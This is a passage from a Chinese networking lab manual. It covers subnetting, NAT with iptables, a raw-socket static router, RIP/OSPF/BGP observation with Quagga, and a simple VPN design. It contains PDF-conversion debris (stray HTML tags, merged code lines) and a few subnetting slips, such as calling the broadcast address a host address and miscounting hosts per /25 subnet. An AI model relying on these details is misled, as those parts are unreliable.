以太网交换机在数据链路层上基于端口进行了数据使得冲突域被缩小到交换机的每一个端口,有效地提高了网络系统的利用率。但随着网络规模的增大,网络内主机数量急剧增加。当这些主机都同属一个局域网即同一广播域时,网络中任一主机发送的广播报文将被转发给广播域中的全部主机,造成网络利用率大幅下降。为避免这种情况,我们将大的广播域隔离成多个较小的广播域,即进行子网划分。
子网的划分,实际上就是设计子网掩码的过程。子网掩码主要是用来区分 IP 地址中的网络 ID 和主机 ID,它用来屏蔽 IP 地址的一部分,从 IP 地址中分离出网络 ID 和主机 ID。最初 IP 地址空间被分为 A 类,B 类,C 类三个分类网络,IP 地址的分配把 IP 地址的 32 位按每 8 位为一段分开。这使得前缀必须为 8,16 或者 24 位。因此,可分配的最小的地址块有 256(24 位前缀,8 位主机地址,28=256)个地址,而这对大多数企业来说太少了。大一点的地址块包含 65536(16 位前缀,16 位主机,216=65536)个地址,而这对大公司来说都太多了。这导致不能充分使用 IP 地址和在路由上的不便,因为大量的需要单独路由的小型
网络(C 类网络)因在地域上分得很开而很难进行聚合路由,于是给路由设备增加了很多负担。为了解决这个问题,而引入了无类别域间路由(CIDR)也即可变长子网掩码(VLSM)。
例如 IP 地址段:192.168.0.1-192.168.0.254,其中 192.168.0 这个属于网络号码,而 1~
254 表示这个网段中最大能容纳 254 台主机。192.168.0.1-192.168.0.254 默认使用的子网掩码
为 255.255.255.0,其中的 0 在 2 进制中表示为 8 个 0。因此有 8 个位置没有被网络号码给占
用,2 的 8 次方就是表示有 256 个地址,去掉一个头(网络地址)和一个尾(主机地址),
表示有 254 个主机地址,因此我们想要对这 254 来划分的话,就是占用最后 8 个 0 中的某几位。假如占用第一个0,那么2 进制表示的子网掩码为11111111.11111111.11111111.10000000。转换为 10 进制就为 255.255.255.128,些时主机数即为 2 的 7 次方(不再是原来的 2 的 8 次方
了),2 的 7 次方=128,因此假如子网掩码为 255.255.255.128 的话,这个地址段可以被区分
为 2 个网络, 每个网络中最多有 128 台主机。 192.168.0.1-192.168.0.127 为一个,
192.168.0.128-192.168.0.255 为第二个。关于CDIR 块的匹配如图所示:
/Image_024.png)
- NAT
NAT(Network Address Translation)网络地址转换。NAT 的出现是为了解决 IP 日益短缺的问题,使用 NAT 技术可以在多重 Internet 子网中使用相同的 IP,从而解决了 IP 地址不足的问题,而且还能够有效地避免来自网络外部的攻击,隐藏并保护网络内部的计算机。NAT的运作机制是自动修改 IP 报文的源 IP 地址和目的 IP 地址,IP 地址校验则在NAT 处理过程中自动完成。NAT 的实现方式有三种,即静态转换 Static Nat、动态转换 Dynamic Nat 和 端口多路复用OverLoad。
静态转换是指将内部网络的私有 IP 地址转换为公有 IP 地址,IP 地址对是一对一的,是一成不变的,某个私有 IP 地址只转换为某个公有 IP 地址。借助于静态转换,可以实现外部网络对内部网络中某些特定设备(如服务器)的访问。
动态转换是指将内部网络的私有 IP 地址转换为公用 IP 地址时,IP 地址对是不确定的,而是随机的,所有被授权访问上 Internet 的私有 IP 地址可随机转换为任何指定的合法 IP 地址。也就是说,只要指定哪些内部地址可以进行转换,以及用哪些合法地址作为外部地址时,就可以进行动态转换。动态转换可以使用多个合法外部地址集。当 ISP 提供的合法 IP 地址略少于网络内部的计算机数量时。可以采用动态转换的方式。
端口多路复用(Port address Translation,PAT)是指改变外出数据包的源端口并进行端口转换,即端口地址转换.采用端口多路复用方式。内部网络的所有主机均可共享一个合法外部
IP 地址实现对 Internet 的访问,从而可以最大限度地节约 IP 地址资源。同时,又可隐藏网络内部的所有主机,有效避免来自 Internet 的攻击。因此,目前网络中应用最多的就是端口多路复用方式。
- iptables
iptables 是建立在 netfilter 架构基础上的一个包过滤管理工具,最主要的作用是用来做防火墙或透明代理。iptables 从 ipchains 发展而来,它的功能更为强大。iptables 提供以下三种功能:包过滤、NAT(网络地址转换)和通用的 pre-route packet mangling。包过滤:用来过滤包,但是不修改包的内容。iptables 在包过滤方面相对于 ipchians 的主要优点是速度更快,使用更方便。NAT:NAT 可以分为源地址 NAT 和目的地址 NAT。
iptables 通过 iptables 命令设置规则,并将其添加到内核空间的过滤表内的链中。iptables命令的语法规则如下:
iptables [-t table] command [match] [target]
系统根据链中的规则进行过滤。iptables 包含三个表,filter 管理本机进出、nat 管理后端主机、
mangle 管理特殊标志使用。此外还可以自订额外的链。实验中将用到的是表nat,用作进行来源与目的的替换。其中链 PREROUTING 中为进行路由判断之前所要进行的规则;链
POSTROUTING 中为进行路由判断之后所要进行的规则;链 OUTPUT 中为与发送出去的数据包相关的规则。
NAT 工作的原理是修改 IP,对于一次通讯中 IP 转换的完整过程通过两条链完成,
POSTROUTING 链修改来源 IP(SNAT),PREROUTING 链修改目的 IP(DNAT)。内部主机访问外部网络时,SNAT 起作用,替换掉PDU 中不合法的内部源 IP 地址,外部响应到达
时,DNAT 起作用,替换 PDU 中的目的 IP 地址为内网 IP,再由路由转发给内部主机。不过
iptables 运行时维护有一个表记录了数据包中 IP 的转换,实际中只用使用 POSTROUTING
链即可。
实验目标
本实验的主要目的是让学生能熟练地按照需求配置一个静态的包含多个子网的网络环境,并学会NAT 的组网方式,为以后的实验的过程中对组网的要求的打下基础。
部署,操作/设计步骤(虚拟机器的配置和拓扑)
-
虚拟网络配置
-
按照提示安装/拷贝多个虚拟机
- 根据拓扑图连接网络拓扑图如下:
/Image_025.jpg)
-
-
设置 IP 与路由规则
/Image_025.jpg)
令 router0 的网段为 192.168.2.0/24,假设 swich0 连接有 80 台主机,swich2 连接有 20台主机。请按要求自行划分子网,并为各主机设置 IP,然后根据 IP 添加路由规则。所用到的命令同前一个实验。设置完成后用 ping 命令检测是否联通。
- 用 iptables 进行网络地址转换
在模拟 router0 的虚拟机上使用 iptables 进行网络地址转换。实验中采用静态NAT。 假设 router0 具有外部 IP:210.28.130.166 并用 eth0 与router1 连接,然后 router0 通过 iptables
进行映射,需要添加链 POSTROUTING。使用如下命令设置:
sudo iptables -t nat -A POSTROUTING -o eth0 -s 192.168.2.0/24 -j SNAT --to 210.28.130.166
实验要求完成出网地址映射操作后,在 PC0 上分别ping PC1,PC2,PC3,用 wireshark
抓包,记录抓取的PDU,并作简单分析。
注意事项
1、为保证有效的完成实验,可以先在手册中为各个节点分配好 ip 地址和子网掩码,然后再上机实现;
2、建议 VMware 中启动的虚拟机的名称与手册中的各对应节点的名称相同;
3、连接网络过程中,优先配置两台router 的地址,要注意router 上有多个网卡,各个网卡对应不同的 VMnet,不要出错,可以先不在 router 上填写路由表,但要确认有默认路由表,设置 ip_forward 的值为 1(见实验一);
4、配置 PC,注意 PC0,PC1,PC3 的子网掩码为 25 位,并注意填写 PC 默认网关;
5、完成以上步骤后,图的左部分可以相互通信。右部分可以相互通信,但是图的左半边和右半边不能通信;
6、在 router0 添加路由规则,使得所有目的节点的网络地址为 PC2 所在的网络地址的包通过router1 的某一端转发,但注意所选取的这一端一定是与router0 处在同一网段上(如下图router0 上添加的这条命令为 sudo ip route add 192.168.2.0/24 via 192.168.1.2),如果前几步都对,则router0 ping PC2 成功;
/Image_026.jpg)
实验四 静态路由编程实现
实验任务
/Image_027.jpg)
-
按照上图的网络拓扑,搭建网络,注意,所有 PC 和路由器不要设置 IP 地址。
-
在PC1 和PC2 上建立自己的ARP 表和 IP 表,用 Raw Socket 实现收发ICMP 包的程序。
-
在 Router1 和Router2 上建立自己的ARP 表、IP 表和路由表,用 Raw Socket 实现 IP 包的静态路由转发程序。
-
在每个PC 和 router 上运行 ifconfig,确保 IP 地址为空,截屏。
-
用第 2 步的收发包程序,从PC1 ping PC2,把运行结果以及 Wireshark 的抓包结果进行截屏和分析。
提交材料:实验报告+程序源代码
实验报告
由于本次实验着重程序的设计,试验报告中将不要求统一的配置性细节,大家可以自行设置实验环境。
实验者需提交源代码以及实验报告。提交文件布局如下:
/Image_028.jpg)
其中 source.c 为 C 的源文件,configuration.file 为相关配置文件。建议同学可以在
source.c 中的重要代码或者函数入口处添加注释,不做定性要求。
实验报告最好提交成 word 文档或 pdf 文档,格式应该包含下表内容,同学可以根据内容进行修改,但是各个项目不可省略。说明是为了更详细的解释各个项目,提交的实验报告中无需包含。
|
实验目的 | |
|
数据结构说明 |
说明:此处需要解释各自的源代码中的数据结构,以及其用途。示例: floag weight; int age; }; 该结构是一个描述 xiaomaolv 的结构,对应于现实生活农场中养的毛驴,其中 id 是其在农场中的编号,weight,age 分别代表了该毛驴的质量和年龄。 |
|
配置文件说明(非必须) |
说明:此处需要给出配置文件的格式以及读取方式,如程序中没有用到配置文件,则该项可省略 |
|
程序设计的思路以及运行流程 |
说明:此处需要给出程序的运行流程或者思路。请给出如下两种格式之一:
5.程序结束 |
|
运行结果截图 |
说明:请给出你的运行结果截图 |
|
相关参考资料 |
说明:请给出你完成该实验的参考书目或者网页 |
|
对比样例程序 |
说明:请给出你参考样例程序的部分,假如没有参考点,填无 |
|
代码个人创新以及 思考 |
说明:请给出你认为你的源代码中的亮点,比如,针对某个细 节的处理或者算法的优化 |
|
该程序的应用场景 创新(非必须) |
说明:请思考一下,该类程序除了在背景中的应用之外,是否 还有其他可能的应用场景。 |
背景知识
路由
路由是一种把信息从源穿过网络传递到目的地的行为,在路上,至少遇到一个中间节点。完成路由工作的核心是路由器,路由器是工作在第三层上的设备。路由器一般都包含路由和交换功能,在这里,仅仅讨论路由功能。
路由整体上是由两个部分构成的,路径选择和数据交换。其中路径选择主要是基于路由算法来确定的,不同的路由算法可能会得出不同的路径选择方式。至于数据交换,仅仅是在 2 层上的数据传输,这个交换的前提是按照之前确定的算法进行的。
静态路由
在众多的路由算法分类之中,有一种是静态路由和动态路由的划分。所谓静态路由,就是在网路工作前,由网络管理员事先配置好的网络表映射来确定包的路由方式。而动 态路由是一种可以随着网络改变而动态改变路由表的方式。这里要求实现一个静态路由,所以不深入讨论动态路由的实现。
系统实现
在操作系统中,是自动拥有路由表的。
在 shell 下输入route 命令,可以查看当前的路由表信息:
/Image_029.jpg)
图 1
在这张路由表中,Destination,Gateway,Genmask,Iface 分别对应于目的网络,网关,子网掩码,对应的网络接口。
通过 ARP 命令查看系统的 ARP 缓存:
/Image_030.jpg)
图 2
Address,HWtype,HWaddress,Iface 分别对应于 IP 地址,硬件类型,硬件地址,网络接口。
在一个真正的系统当中,对于一个包的路由过程可以看成如下:首先,一个包要发往一个地址,那么根据该地址在路由表中进行查询,找到对应的网关,然后将包转发到网关上,而转发到网关的过程中,会用到 ARP 缓存来确定以太帧的MAC 头信息。此时,我们需要动态的更新查找 ARP 缓存来填充头部信息。然后发送。
实验目标
本实验主要目的设计和实现一个简单的静态路由机制,用以取代 Linux 实现的静态路由方式,进而加深对二三层协议衔接及静态路由的理解。
部署,操作/设计步骤
数据结构以及流程实现
回顾在背景知识中介绍的路由过程以及系统实现中的数据结构,我们确定了我们自己的简单路由协议至少要具备如下数据结构:
//the information of the static routing table struct route_item{
char destination[16]; char gateway[16]; char netmask[16]; char interface[16];
}route_info[MAX_ROUTE_INFO];
// the sum of the items in the route table int route_item_index=0;
一个简单的静态路由表,该表是符合于静态路由协议的,那么也就是说路由路径的选择是通过该静态路由表来确定的,而且该路由表除了手动修改之外在程序运行过程之中不会改变。
//the informaiton of the " my arp cache" struct arp_table_item{
char ip_addr[16]; char mac_addr[18];
}arp_table[MAX_ARP_SIZE];
// the sum of the items in the arp cache int arp_item_index =0;
一个可以动态改变的 ARP 缓存
该 ARP 缓存可以在运行的过程中动态的添加删除 arp 表项。除此之外,为了方便,还增加了一个模仿系统网络配置的数据结构。
// the storage of the device , got information from configuration file : if.info struct device_item{
char interface[14]; char mac_addr[18];
}device[MAX_DEVICE];
// the sum of the interface
int device_index=0;
定义完数据结构之后,我们应该定义一下这个静态路由程序的工作流程,我们需要回顾一下,一个路由器的工作方式。
路由器可以看作是一个重复工作的循环机器,当它启动的时候,管理员会设置它的
启动选项,并对它的路由表,路由策略进行选择,他自己也要初始化自己的一些其他类似于操作系统的信息,它监听设备上的许多硬件接口,查看着每一个它收到的包,当一个数据包符合它路由表的条件的时候,它就会根据路由表的信息对其进行转发,在转发的过程由于是通过其他的接口的转发,必然要用到 arp 缓存中的数据项,当一个数据包符合在网络上准确传输的时候,它就会将这个经过它重重修改的包发送到对应的接口上去,这个数据包未来的发展就与它无关了,它所要做的就是继续监听,并重复之前做过的事情。
根据一个路由器的工作流程,我们也可以模仿出我们静态路由程序的工作流程。
/Image_031.png)
路由程序初始状态
读取配置文件并初始化路由程序中的数据结构
监听所有的网口
捕获到一个来自于本地网口的数据包
解析包头并判断 否
是否转发
是
更改包头并转发到响应的接口
图 5
其中监听网口和我们可以看作是创建一个socket,并 recvfrom 在这个端口之上,假如收到包的话,就算是捕获到一个来自本地网口的数据包。
实验五 动态路由协议 RIP,OSPF 和 BGP 观察
背景知识
- 自治系统
自治系统(AS,Autonomous System),是一个处于一个或多个管理机构控制之下的路由器和网络群组。一个自治系统中的所有路由器必须相互连接,运行相同的路由协议,所使用的路由协议由系统自主决定,因此有时也被称为是一个路由选择域(routing domain)。自治系统自主决定用于进行网络内部路由信息通信的协议称为内部网关协议(IGP,Interior Gateway Protocols),而各个自治系统网络之间则是通过边界网关协议(BGP,Border Gateway
Protocol)来共享路由信息。每个自治系统都会被分配一个全局的唯一的号码,自治系统号
(ASN)。这个号码用于标识出一个自治系统,以支持 BGP。
- 内部网关协议
内部网关协议(IGP)是一种专用于一个自治系统中网关间交换数据流转通道信息的协议。网络 IP 协议或者其他的网络协议常常通过这些通道信息来决断怎样传送数据流。目前的内部网关协议有RIP、OSPF、IGRP、EIGRP、IS-IS 等协议。其中最常用的两种内部网关协议分别是:路由信息协议(RIP)和最短路径优先路由协议(OSPF)。
1. 路由信息协议
路由信息协议(<span class="s14">RIP</span>,<span class="s14">Routing Information Protocol</span>)是应用较早、使用较普遍的内部网关协议,它采用距离向量算法,适用于小型网络。在默认情况下,<span class="s14">RIP </span>使用跳跃计数<span class="s14">(hop count)</span>作为来衡量路由距离,跳跃计数是一个包到达目标所必须经过的路由器的数目。如果到相同目标有二个不等速或不同带宽的路由器,但跳跃计数相同,则 <span class="s14">RIP </span>认为两个路由是等距离的。跳跃计数取值为 <span class="s14">1~15</span>,数值 <span class="s14">16 </span>表示无穷大。<span class="s14">RIP </span>使用 <span class="s14">UDP </span>的 <span class="s14">520 </span>端口来发送和接收
RIP <span class="s13">报文。</span>RIP <span class="s13">报文每隔 </span>30s <span class="s13">以广播的形式发送一次,为了防止出现</span>“<span class="s13">广播风暴</span>”<span class="s13">,其后续的的报文将做随机延时后发送。在 </span>RIP <span class="s13">中,如果一个路由在 </span>180s <span class="s13">内未被刷新,则相应的距离就被设定成无穷大,并从路由表中删除该表项。</span>RIP <span class="s13">报文分为两种:请求报文和响应报文。</span>
2. 开放式最短路径优先
开放式最短路径优先(<span class="s14">OSPF</span>,<span class="s14">Open Shortest Path First</span>)是另一种被广泛使用的内部网关协议。<span class="s14">OSPF </span>根据域中的链路状态来决策路由,计算出最短路径树,通常多用于较大型的网络。<span class="s14">OSPF </span>协议同时使用单播(<span class="s14">unicast</span>)和多播(<span class="s14">multicast</span>)来发送<span class="s14">Hello </span>包和连接状态更新(<span class="s14">link state updates</span>),使用的多播地址为 <span class="s14">224.0.0.5 </span>和 <span class="s14">224.0.0.6</span>。不同于<span class="s14">RIP </span>的是,<span class="s14">OSPF</span>协议直接使用 <span class="s14">IP </span>协议,并将链路状态广播数据包传送给在某一区域内的所有路由器,而不是将部分或全部的路由表传递给与其相邻的路由器。
- 边际网关协议
边界网关协议(BGP,Border Gateway Protocol)是互联网的核心路由协议。它通过维护路由表来实现自治系统之间的可达性,属于向量路由协议。BGP 不使用传统域内路由协议的距离度量,而是基于路径、网络策略和规则集来决定路由。BGP 通过在路由器上手工设置来使用 TCP 的 179 号端口来发送和接收报文。BGP 路由器会周期地发送 19 字节的保持
存活报文来维护连接(默认周期为 60 秒)。当 BGP 在一个自治系统内部运行时,它被称作内部边界网关协议(iBGP,Interior Border Gateway Protocol);当 BGP 在 AS 之间运行时,它被称作外部边界网关协议(eBGP,Exterior Border Gateway Protocol)。
- Quagga
Quagga 是一个提供了基于TCP/IP 协议的路由服务的软件包。Quagga 工作在Uinx 平台上,是 GNU Zebra 的分支之一。除可提供静态路由服务外,Quagga 还支持 RIPv1,RIPv2, RIPng,OSPFv3,BGP-4,BGP-4+等动态路由协议。Quagga 由多个守护进程组成,结构如图所示:
/Image_032.jpg)
其中核心的是zebra,它可以读取和更新内核路由表,为其它守护进程提供操作 Unix 和TCP数据流的 API。Ospfd 实现了 OSPFv2 协议;ripd 实现了 RIPv1 和 RIPv2 协议;ospf6d 实现了 OSPFv3 协议;ripngd 实现了 RIPng 协议;bgpd 实现了 BGPv4 和 BGPv4+协议。
实验目标
理解自治系统(AS),观察 RIP,OSPF 以及 BGP 动态路由协议的实际运行过程。在网络拓扑结构变更的情况下观察路由表的动态变更,通过实验理解路由选择算法。
实验任务
-
RIP 协议观察
-
按照提示安装/拷贝多个虚拟机
- 根据拓扑图连接一个简单链状网络拓扑图如下:
/Image_033.jpg)
注意:请为 router0 预留一个网口,为 router3 预留两个网口
3. 给每个连接在网络上的网卡设置 <span class="s14">ip</span>使用 ifconfig 命令进行设置,或通过 zebra.conf 文件进行设置(见 1.4)
4. 运行<span class="s14">RIP </span>协议 1. 在<span class="s14">/etc/quagga/</span>目录下添加两个配制文件 <span class="s14">zebra.conf </span>和 <span class="s14">ripd.conf</span>。 1. 本次实验中我们只需进行简单的配制,若已通过 <span class="s14">ifconfig </span>命令为网卡设置过 <span class="s14">ip</span>,则可以直接使用 <span class="s14">quagga </span>的配置示例,复制示例中的配制文件,使用命令如下: sudo cp /usr/share/doc/quagga-core/examples/zebra.conf.sample /etc/quagga/zebra.conf 2. 若未使用 <span class="s14">ifconfig </span>命令。可通过使用 <span class="s14">zebra.conf </span>文件设置,内容如下: !-*-zebra-*- hostname router password zebra enable password zebra log stdout ! interface _network_ description Interface to External Network ip address _a.b.c.d/m_ ! interface _network_ description Interface to Internal Network ip address _a.b.c.d/m_ ! <p class="s13" style="padding-top: 5pt;padding-left: 6pt;text-indent: 0pt;line-height: 123%;text-align: left;">注意,请根据具体情况选择使用<span class="s14">"External Network" </span>连接外部网络,<span class="s14">"Internal Network" </span>连接内部网络;<span class="s14">"ip address </span><span class="s27">a.b.c.d/m</span><span class="s14">"</span>中<span class="s27">a.b.c.d/m </span>表示网络设备的<span class="s14">ip </span>地址和子网掩码,如<span class="s14">10.0.0.1/8</span>。建立 rip 配置文件 ripd.conf,内容如下:
!-*-rip-*- hostname ripd password zebra router rip network _network_ log stdout ! <p style="text-indent: 0pt;text-align: left;"> <span class="s13">注意,若有多个网络设备要运行 </span>RIP <span class="s13">协议,则要在配置文件中写入多条</span>"network _network_"<span class="s13">,</span> <span class="s27">network </span>表示网络设备,如 <span class="s14">eth0</span>。 2. 启动 <span class="s14">wireshark </span>准备抓取报文,然后启动 <span class="s14">zebra</span>,<span class="s14">ripd </span>两个进程,使用命令如下 :sudo systemctl start zebra sudo systemctl start ripd
注意,当确保以上操作无误而<span class="s14">Route0</span>,<span class="s14">Route1</span>仍然无法<span class="s14">ping</span>通时,注意路由转发功能是否开启。- 观察 RIP 报文
-
-
OSPF 协议观察
-
按照提示安装/拷贝多个虚拟机
- 根据拓扑图连接一个简单链状网络拓扑图如下:
/Image_034.jpg)
注意:请为router4 预留一个网口
3. 给每个连接在网络上的网卡设置 <span class="s14">ip</span>设置方式同 1.
4. 运行 <span class="s14">OSPF </span>协议 1. 在<span class="s14">/etc/quagga/</span>目录下添加两个配制文件 <span class="s14">zebra.conf </span>和 <span class="s14">ospfd.conf</span>。设置方式同 <span class="s14">1</span>。建立 ospf 配置文件 ospfd.conf,内容如下:
!--ospf-- hostname ospfd password zebra router ospf
network _a.b.c.d/m _area 0 log stdout ! <p class="s13" style="padding-top: 4pt;padding-left: 6pt;text-indent: 0pt;line-height: 115%;text-align: left;">注意,若有多个网络设备要运行 <span class="s14">OSPF </span>协议,则要在配置文件中写入多条<span class="s14">"network </span><span class="s27">a.b.c.d/ m </span><span class="s14">area 0"</span>,<span class="s27">a.b.c.d/m </span>表示网络设备所处的网络,如 <span class="s14">192.168.1.0/24</span>。 2. 启动 <span class="s14">wireshark </span>准备抓取报文,然后启动 <span class="s14">zebra</span>,<span class="s14">ospfd </span>两个进程,使用命令如下: sudo systemctl start zebra sudo systemctl start ospfd- 观察OSPF 报文
-
-
BGP 协议观察
- 根据拓扑图连接两个AS
拓扑图如下:
/Image_035.jpg)
2. 给两个新连接的网卡设置 <span class="s14">ip</span>设置方式同 1。
3. 运行<span class="s14">BGP </span>协议 1. 在<span class="s14">/etc/quagga/</span>目录下添加配制文件<span class="s14">bgpd.conf</span>。 bgpd <span class="s13">配置文件 </span>bgpd.conf <span class="s13">内容如下:</span>!--bgp-- hostname bgpd password zebra router bgp asn
bgp router-id _a.b.c.d_ network _a.b.c.d/m_ neighbor _a.b.c.d _remote-as _asn_ log stdout ! <p class="s14" style="padding-top: 7pt;padding-left: 7pt;text-indent: 0pt;line-height: 115%;text-align: left;"><span class="s13">其中</span>"router bgp _asn_"<span class="s13">中的 </span>_asn _<span class="s13">为</span>AS <span class="s13">号,例如 </span>100<span class="s13">。</span>"bgp router-id _a.b.c.d_"<span class="s13">中 </span>_a.b.c.d _<span class="s13">为网络设备的 </span>IP<span class="s13">。</span>"network _a.b.c.d/m_"<span class="s13">中 </span>_a.b.c.d/m _<span class="s13">为 </span>AS <span class="s13">内部网络地址的集。</span>_"_neighbor _a.b.c.d _remote-as <span class="s27">asn</span><span class="s14">"</span>中 <span class="s27">a.b.c.d </span>和 <span class="s27">asn </span>分别为相邻 <span class="s14">AS </span>的网络设备 <span class="s14">IP </span>和 <span class="s14">AS </span>号。 2. 启动 <span class="s14">wireshark </span>准备抓取报文,然后启动<span class="s14">bgpd </span>进程,使用命令如下:sudo systemctl start bgpd
注意,若配置正确,此刻Router 3,Router 4有AS 1,AS 2全部的路由表项,然而AS 1,AS 2
内部的机器仍然只有其内部的路由表项- 观察BGP 报文
-
观察路由表动态变更
- 观察初始网络情况
观察 router0 的路由表,并追踪 router0 到 router3 的包传输路径,使用命令如下:
tracepath ip
2. 添加一条连接,变更原来的网络结构连接 <span class="s14">router0 </span>和 <span class="s14">router3</span>,拓扑图如下:/Image_036.jpg)
3. 观察变更后网络情况 1. 给两个新连接的网卡设置 <span class="s14">ip</span>,设置方式同 <span class="s14">1</span>。 2. <span class="s13">在 </span>router0<span class="s13">,</span>router3 <span class="s13">中的 </span>ripd.conf <span class="s13">文件中加入</span>"network _network_"<span class="s13">,重启</span>quagga<span class="s13">。</span> 3. 观察 <span class="s14">router0 </span>的路由表,并追踪 <span class="s14">router0 </span>到 <span class="s14">router3 </span>的包传输路径,使用命令同 <span class="s14">4.2</span>
/Image_033.jpg)
/Image_034.jpg)
/Image_035.jpg)
/Image_036.jpg)
实验报告
|
实验目的 | |
|
网络拓扑配置 |
说明:填写附表 1,也可绘图说明 |
|
路由配置文件 |
说明:即 zebra.conf,ripd.conf,ospfd.conf,bgpd.conf。根据实际配置给出实验结束时 router0,router3,router4 和 router6 中的配置 文件即可 |
|
数据包截图 |
说明:用 wireshark 抓包截图,RIP,OSPF,BGP 报文各一,需要标明抓包的路由器和端口 |
|
协议报文分析 |
说明:分析抓取的报文 |
|
观察动态路由 |
说明:比较网络变更前后router0 的路由表 |
按要求完成实验,并写出实验报告。实验报告格式如下,同学可以根据内容进行修改。说明是为了更详细的解释各个项目,提交的报告中无需包含。
附表 1:
|
节点名 |
虚拟设备名 |
ip |
netmask |
|
Router0 |
eth0: | ||
|
eth1: | |||
|
Router1 |
eth0: | ||
|
eth1: | |||
|
Router2 |
eth0: | ||
|
eth1: | |||
|
Router3 |
eth0: | ||
|
eth1: | |||
|
eth2: | |||
|
Router4 |
eth0: | ||
|
eth1: | |||
|
Router5 |
eth0: | ||
|
eth1: | |||
|
Router6 |
eth0: |
实验六 VPN 设计、实现与分析
背景知识
VPN,Virtual Private Network,也就是虚拟专用网。是一种通过一个公用网络建立一个临时的,安全的连接,是一条穿过混乱的公用网络的安全,稳定的隧道。常用的虚拟专用网协议有 IPSec,PPTP,L2F,L2TP 以及 GRE。IPSec 是 IP Security 的缩写,是保护 IP 协议安全通信的标准,它主要对 IP 协议分组进行加密和认证。PPTP 的全称是 Point to Point Tunneling Protocol 点到点隧道协议。L2F 是 Layer 2 Forwarding,也就是第二层转发协议的缩写。L2TP 是 Layer 2 Tunneling Protocol 第二层隧道协议的缩写。
GRE 是 VPN 的第三层隧道协议。
当前VPN 的需求很大,原因是随着集团公司规模的扩大以及其他的一些专用需求, 特定的私有网络得到很大的青睐,但是单独建设私有网络或者租用私有网络的成本很高,那么此时通过VPN 实现的,建立在普通互联网技术之上的私有网络技术得到很多 IT 部 门的认可。
下面给出一些参考资料,大家可以查看他们来对VPN 获得更加深入的认识。 http://en.wikipedia.org/wiki/Virtual_private_network http://computer.howstuffworks.com/vpn.htm
同时大家如果有兴趣,可以参加开源 VPN 软件 OpenVPN 的开发
另外还有一些有关 VPN 实现的 RFC 文档
http://www.ietf.org/rfc/rfc2637.txt
实验目标
本实验主要目的是设计和实现一个简单的虚拟专用网络的机制, 并与已有的标准实现(如 PPTP)进行比较, 进而让学生进一步理解 VPN 的工作原理和内部实现细节。
实验任务
1 实验环境搭建
首先明确我们的目的,我们是要实现一个简易的 VPN,从 VPN 的定义来看,我们首先需要一个单独的网络来模拟因特网,其次对于每个连接VPN 的主机,都需要一个VPN入口,也就是一个 VPN 接入服务器,通过该服务器来实现主机的 VPN 接入,该服务器负责将主机的发送包进行重封装并传递到目标 VPN 主机,并接受传递到自身下属主机的
VPN 包,并跟据VPN 解包规范进行包的解析,并传递要对应的VPN 主机。 整个网络的拓扑如下:
/Image_037.jpg)
图 1
其中VPNServer1,Network,VPNServer2 之间的连接可以看作是整个互联网,因为互联网只不过是众多的这样的连接的集合。
其中 PC 1,PC 2 是接入VPN 的 2 个主机。VPNServer1 和VPNServer2 是 2 个 VPN的接入口,实际上,我们要实现的VPN 程序就是运行在 2 台机器上的。Network,一个配置了路由转发的主机,模拟了整个互联网络。我们最终的要求是 PC 1 可以通过VPN的 IP 地址同PC 2 进行交互。2 者通过系统的网络配置无法互相沟通,而当在 VPNServer1和 VPNServer2 上运行VPN 程序的时候,二者可以通过 VPN 虚拟出来的 IP 进行通讯。 为了完成以上的拓扑,做出如下配置。(默认 eth0 为左,eth1 为右)。
PC 1 网络配置
PC 1#ifconfig eth0 10.0.0.2 netmask 255.255.255.0
PC 1#route add default gw 10.0.0.1
PC 1# sudo /etc/init.d/networking restart
PC 2 的配置同 PC 1 的配置类似
PC 2#ifconfig eth0 10.0.1.2 netmask 255.255.255.0
PC 2#route add default gw 10.0.1.1
PC 2# sudo /etc/init.d/networking restart
下面配置 2 个VPN 接入服务器VPNServer1,VPNServer2
VPNServer1#ifconfig eth0 10.0.0.1 netmask 255.255.255.0
VPNServer1#ifconfig eth1 192.168.0.2 netmask 255.255.255.0 VPNServer1#route add default gw 192.168.0.1 VPNServer1# sudo /etc/init.d/networking restart
VPNServer2#ifconfig eth0 172.0.0.2 netmask 255.255.255.0
VPNServer2#ifconfig eth1 10.0.1.1 netmask 255.255.255.0 VPNServer2#route add default gw 172.0.0.1 netmask 255.255.255.0 VPNServer2# sudo /etc/init.d/networking restart
下面配置里面的虚拟路由器,用来模拟整个因特网的节点 Network
Network#ifconfig eth0 192.168.0.1 netmask 255.255.255.0
Network #ifconfig eth1 172.0.0.1 netmask 255.255.255.0 Network #echo 1 > /proc/sys/net/ipv4/ip_forward Network # sudo /etc/init.d/networking restart
2 程序实现
当整个拓扑搭建完成之后,下面我们要做的事就是实现这个简单的 VPN 程序。首先,我们要明确的是在实际的 Internet 上面,跑的是标准的 IP 包,IP 包封装的才是真正的 VPN 包。我们可以认为,在 VPN 接入点上,就是将 VPN 包进行重新封装,并传递到网络上。直到某个 VPN 接入点接收到该包,解析包头确定其确是属于某个 VPN 的包,然后将其重新解包并传递到内部的VPN 节点上。一个基本的包在 VPN 网络上传递的流程如下:
一个标准的 IP 包,包的内容未知,包头地址为 VPN 地址
发送到VPN
/Image_038.png)
接入口上
包被解析,被发现可以路由,将整个包作为内容添加必要头部信息,添加到一个标准的可以在网络上传输的 IP 包中
VPN 接入口收到该包,将其解包,并查看内容头部信息,发现确是本接入点所在 VPN 网络上的主机能接收的。将其重新解包,发送到目的主机。
作为一个标准的 IP 包在网络上进行传输,过程同一般的 IP 包没有区别。目的地址为对应 VPN 目的地址所在网络的接入口
包被接收,传输完毕
图 2
从 VPN 接入点的角度来看,有如下流程图
/Image_039.png)
读取配置文件,设置基于 VPN
的基本路由,ARP 缓存信息
对机器各个接口进行监听,如有包进入,将对包的类型进行检测
来 自 内 部 来 自 外 部
查询VPN 虚拟路由,对收到的包进行重新打包,并发送到互联网上
查询 VPN 虚拟路由以及其他信息,对该报进行解包,重新安插以太头部信息,并发送到相应节点上
图 3
由上面的图我们可以看到,该程序仍然相当于一个路由程序,只不过需要重新封装基于 VPN 的包内容。联系实验 2,我们可以借用简单路由程序的数据结构。由于 VPN节点需要明确指出,所以,在这里需要更改。
typedef struct device_ti{ char interface[8]; char mac_addr[6]; int is_entrance;
}DEVICE_INFO_ITEM;
红色字体部分为新增的数据结构内部项,其他的都同简单路由协议。 针对包的重新封装和VPN 包的解析工作主要集中在 2 个函数中实现
int repack_packet(char* buffer, int buffer_length,
char* error_info, DEVICE_INFO_ITEM* device_item_table, int device_table_size,
ROUTE_TABLE_ITEM* route_item_table, int route_table_size);
int unpack_packet(char* buffer, int buffer_length,
